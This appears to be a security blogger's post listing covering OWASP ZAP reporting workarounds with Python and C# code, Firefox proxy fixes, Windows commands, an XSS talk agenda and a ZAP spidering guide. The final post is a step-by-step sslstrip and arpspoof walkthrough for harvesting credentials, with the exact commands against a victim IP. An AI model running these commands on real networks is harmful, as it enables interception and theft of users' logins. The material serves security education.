Computers, Programming, Technology, Music, Literature

Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015

leave a comment »

 

 

 

Title Practical Security Testing for Developers using OWASP ZAP
Abstract Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers could be script kiddies, joyriders, turning from hobbyists to downright hostile. The earlier in the development cycle you find the vulnerabilities, the better they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session shows/demonstrates some attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.
Gist See live attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.
Speaker Marudhamaran Gunasekaran
Time & Venue 21 Feb 2015 @ Dot Net Bangalore 2nd meet up

OWASP ZAP : Workaround – Html Report from APIs daemon mode

leave a comment »

 

Ok, may be the title is a bit misleading. The below post is going to show you a few workarounds that you can use to generate (or mimic) a html report when running OWASP ZAP automated in a headless mode.

Zed Attack Proxy (ZAP), as of version 2.3.1 stable release, provides options to generate an Xml report and an html report for the alerts found. We could get these two reports from the UI via the Report menu.

Use case:

One of the unique features of ZAP is the REST API that aids in automating scans. When running ZAP in daemon mode and pivoting ZAP from the REST APIs, there is a number of ways to harvest the alerts identified by ZAP.

Here’s a couple of them:

  1. alerts based on id (http://localhost:7070/UI/core/view/alert/)
  2. alerts for the baseurl (http://localhost:7070/UI/core/view/alerts/)
  3. xmlreport (http://localhost:7070/UI/core/other/xmlreport/) [Same as clicking Report –> Generate Xml Report…]

Using the API and your favorite programming language, you could very well gather the alerts and decide what you want to do with it.

Problem:

One convenience is just pulling a html report out of the scan and mail the application owners or ourselves so they could be fixed. There is an enhancement request open in the projects page – https://code.google.com/p/zaproxy/issues/detail?id=1355

Until the feature is available in the next stable release, I decided to love with a couple of workarounds. There is a workaround in python, there is also a workaround in an exe format (written in C#). They are not perfect in terms of formatting, but they are close enough to the original html report generated through the ZAP UI.

Workarounds:

Download from here – https://github.com/gmaran23/HtmlReportThroughZapAPIs

 

Workaround #1:

A python script to inject an xslt stylesheet into the xml report file generated through the API. Use the sample function to insert the sample (ZapReport.xslt) into the xml file generated. Needless to say that the ZapReport.xslt and the xmlreportfile should be in the same location.

If needed to email the xml report, we can zip the xml report with the xslt file, so when unzipped the xslt file resides in the same location as the xml file.

When the xml file is opened in Firefox, or IE –> see the formatting in action! (Does not work in chrome though Sad smile)

import io

def InsertXSLTSheetIntoXmlReport(xmlreportfile, xsltfile, xmlreportfileout):
    texttofind = '<?xml version="1.0" encoding="UTF-8"?>'
    texttoreplace = '<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="{0}" ?>'.format(xsltfile)
    with io.open(xmlreportfile, 'r', encoding="utf8") as f:
        xmlreport = f.read()
    xmlreportstyleinserted = xmlreport.replace(texttofind, texttoreplace)
    with io.open(xmlreportfileout, 'w', encoding="utf8") as f:
        f.write(xmlreportstyleinserted)


InsertXSLTSheetIntoXmlReport('SampleOWASPZAPReport.xml', 'ZapReport.xslt', 'SampleOWASPZAPReport-Mod.xml')

 

There is also another xslt template available from https://code.google.com/p/zaproxy/source/browse/trunk/src/xml/report.html.xsl

 

Workaround #2:

Use the command line program named XmlToHtmlWithXSLT.exe (requires .Net 4.0) as below to obtain a html report as output.

XmlToHtmlWithXSLT.exe SampleOWASPZAPReport.xml ZapReport.xslt converted.html

 

If you don’t have .Net 4.0, use the source below to recompile to any .Net version.

using System;
using System.IO;
using System.Text;
using System.Xml;
using System.Xml.Xsl;

namespace XmlToHtmlWithXSLT
{
    class Program
    {
        static void Main(string[] args)
        {
            string inputXmlFileName = args[0];
            string xsltfile = args[1];
            string outputHtmlFileName = args[2];

            XslCompiledTransform transform = LoadXsltTransform(xsltfile);

            StringWriter transformedToHtml = ApplyXsltTransform(inputXmlFileName, transform);

            WriteHtmlToFile(outputHtmlFileName, transformedToHtml);

            PrintStatus(outputHtmlFileName);
        }


        private static XslCompiledTransform LoadXsltTransform(string xsltfile)
        {
            XslCompiledTransform transform = new XslCompiledTransform();
            using (XmlReader reader = XmlReader.Create(xsltfile, new XmlReaderSettings() { DtdProcessing = DtdProcessing.Ignore }))
            {
                transform.Load(reader);
            }
            return transform;
        }

        private static StringWriter ApplyXsltTransform(string inputXmlFileName, XslCompiledTransform transform)
        {
            StringWriter transformedToHtml = new StringWriter();
            using (XmlReader reader = XmlReader.Create(inputXmlFileName, new XmlReaderSettings() { DtdProcessing = DtdProcessing.Ignore }))
            {
                transform.Transform(reader, null, transformedToHtml);
            }
            return transformedToHtml;
        }

        private static void WriteHtmlToFile(string outputHtmlFileName, StringWriter transformedToHtml)
        {
            using (StreamWriter outputFileStream = new StreamWriter(new FileStream(outputHtmlFileName, FileMode.Create)))
            {
                outputFileStream.Write(transformedToHtml.ToString());
            }
        }

        private static void PrintStatus(string outputHtmlFileName)
        {
            Console.WriteLine("Output Written to {0}", outputHtmlFileName);
        }
    }
}

 

Untill, the enhancement request (https://code.google.com/p/zaproxy/issues/detail?id=1355) is completed, these are some workarounds that I personally could live with, may be you can too, for your automating needs Winking smile.

Worth looking at – https://www.owasp.org/index.php/GSoC2013_Ideas/OWASP_ZAP_Exploring_Advanced_reporting_using_BIRT

Written by gmaran23

January 13, 2015 at 9:52 pm

Plug-n-Hack and ZAP: manually changed proxy settings after initial pnh configuration

leave a comment »

 

Plug-n-Hack introduces and proposes new standards to integrate security tools with the browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh) which allows you to configure Firefox to change it’s proxy settings so that OWASP ZAP could watch the FireFox traffic.

Configuration is a child’s play. Point your browser to the ZAP proxy address, follow instructions, and you are done. Just like the gif image below.

Plug-n-Hack and Zap

This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.

clip_image002

All works.

But, out of curiosity if you went and changed the FireFox proxy settings to No Proxy or Auto-detect proxy settings for this network or Use system proxy settings then the FireFox traffic would not be proxied through ZAP which is expected, Right? That works just fine.

However, when you want Firefox traffic to be proxied through ZAP again, you would copy paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say A provider with this name has already been configured

clip_image002[5]

What is your expectation now?

I don’t know, as a user my expectation when I pasted the http://localhost:7070/pnh url in Firefox is that it should configure my Browser to route it’s traffic via ZAP. But that does not happen.

How to fix?

You can override the proxy settings yourself. Or you could actually use pnh to clear and remove a configuration and then point Firefox to http://localhost:7070/pnh

Shift + F2 in Firefox and then two commands for you:

 

pnh config clear ‘OWASP ZAP’

pnh config remove ‘OWASP ZAP’

 

clip_image002[7]

clip_image004

Written by gmaran23

November 19, 2014 at 6:13 pm

Windows: Get MAC address from the command line

leave a comment »

 

Windows changes with every version and the UI gets twisted and twisted, for a computer user that works with command line for administrative tasks, things are pretty much the same.

If you want to gather the list of MAC address on a particular computer run wither of the below commands:

1. getmac

getmac

image

2. find on ipconfig –all.

 

ipconfig -all | find /i "Physical Address"

 

 

image

Written by gmaran23

November 6, 2014 at 2:37 pm

Posted in Windows

Tagged with , , , ,

Process Explorer vs Process Hacker–Part 1 of 2

leave a comment »

Originally posted on chentiangemalc:

Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!

image

By version 2.01 it had been renamed to HandleEx added some more process properties and kill feature.

image

It wasn’t until 16 June 2001 when Version 5.0 came out that it got renamed to Process Explorer. ( I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:

image

However an open source project has been working on a competing product since…

View original 1,637 more words

Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2

leave a comment »

Originally posted on chentiangemalc:

Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”.While Process Hacker has “Run”, “Run As Limited User”, and “Run As”

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…

image

User name can be any standard user name but also can include special accounts such as:

image

We can also select what “type”

image

Specific sessions can be targeted

image

as well as Desktops…

image

Finding Open Handles/DLLs

In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL

The main difference here is…

View original 757 more words

Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]

leave a comment »

 

 

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

 

 

 

 

Agenda in <ul><li>

 

·         Risk, Stories & the news

·         XSS Anatomy

·         Untrusted Data Sources – Well, Where did that come from?

·         Shouldn’t it be called CSS instead?

·         Types of XSS

          Type 0 [DOM based]

          Type 1 [Reflected or Non-persistent XSS]

          Type 2 [Persistent or Stored XSS]

·         Live Demo: XSS 101 with alert(‘hello XSS world’)

·         Live Demo: Cookie Hijacking and Privilege Escalation

          Face/Off with John Travolta and Nicolas Cage

·         Live Demo: Let’s deploy some Key loggers,huh?

·         Mitigations

          Input Sanitization

          Popular Libraries for .Net, Java, php

§  Demo: Input sanitization

          Whitelists (vs. Blackists)

          Output Encoding

§  Contextual

§  Demo: Output Encoding

          Browser Protections & bypasses

          Framework Protections & bypasses

          Content Security Policy (CSP) in brief

·         Secure Code reviews: Spot an XSS, How?

·         Tools: Do we have an option?

·         XSS Buzz and how to Fuzz

·         Renowned Cheat sheets

·         Further reading & References

 

Does your Autolock Domain Workstation policy fail sometimes? But why?

leave a comment »

 

This article was originally published for www.prowareness.com and could be located at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/

 

The “Password Protect Screensaver” and the “Screen Saver Timeout” controlled by the group policy enables the screen saver to kick in at the specified interval of inactivity and on resume

displays the logon screen and so the workstation needs to be unlocked.

 

Then the normal procedure if you are doing it for the first time, you do a GPUDATE /FORCE. The policy would work like expected, however if some users/managers keep quibbling about their workstation not getting locked after the specified interval, check if any of the below exceptions apply.

 

  1. There is a video playing in YouTube or any website that uses flash based or html5 video player. This should be the active window.
  2. There is a video playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  3. There is an audio playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  4. There is an automated test running. Desktop app automation or browser automation.
  5. A PowerPoint slideshow in progress.

 

The moment a computer is joined to a domain domain the policy would be effective and in case it did not work then it could be because of the above exceptions or the computer was not a part of the domain. The exceptions are asserted based on the fact that they let the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen get’s locked while you are enjoying a movie or you are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

leave a comment »

 

 

 

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23


 

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennets for feedback and sugesstions.

 

 

 

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »

 

 

 

You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim – Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

 

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Follow

Get every new post delivered to your Inbox.